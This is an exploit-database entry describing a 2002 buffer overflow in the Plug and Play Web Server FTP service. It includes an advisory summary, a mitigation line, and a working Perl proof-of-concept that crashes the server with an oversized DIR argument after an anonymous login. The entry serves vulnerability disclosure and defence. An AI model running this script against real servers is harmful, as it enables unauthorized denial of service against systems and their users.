Plug and Play Web Server FTP service Buffer Overflow

vendor:

Web Server FTP service

by:

Bahaa Naamneh

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Web Server FTP service

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

Plug and Play Web Server FTP service Buffer Overflow

Plug and Play Web Server FTP service has been reported prone to multiple buffer overflow issues, the issues present themselves when the affected FTP service handles FTP command arguments of excessive size. It has been demonstrated that a remote attacker may exploit this condition to trigger a denial of service in the affected FTP server. However, due to the nature of this vulnerability, although unconfirmed, it has been conjectured that a remote attacker may leverage this vulnerability to have arbitrary code executed in the context of the vulnerable service.

Mitigation:

Ensure that the FTP server is configured to limit the size of FTP command arguments.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8667/info

Plug and Play Web Server FTP service has been reported prone to multiple buffer overflow issues, the issues present themselves when the affected FTP service handles FTP command arguments of excessive size.

It has been demonstrated that a remote attacker may exploit this condition to trigger a denial of service in the affected FTP server. However, due to the nature of this vulnerability, although unconfirmed, it has been conjectured that a remote attacker may leverage this vulnerability to have arbitrary code executed in the context of the vulnerable service. 

#!/usr/bin/perl
# ppftpdos.pl - Remote denial of service against Plug & Play FTP server

use Net::FTP;

$host = $ARGV[0];

$buffer = "A"x540;

if("$ARGV[0]" eq "") {
        print("DOS against Plug & Play FTP Server by Bahaa Naamneh\n");
        print("b_naamneh@hotmail.com - http://www.bsecurity.tk\n");
        print("====================================================\n");
        die("Usage : ./PPftpdos <host\/ip>\n");
} else {

        print("Connecting to $host...\n");
        my $ftp = Net::FTP->new($host) or die "Couldn't connect to
$host\n";
        print("Connected!\n");

        $username = "anonymous";
        $password = "anonymous";

        $ftp->login($username, $password)
        or die "Could not log in.\n";

        $ftp->dir($buffer);

        $ftp->quit();

        print("Success!\n");
}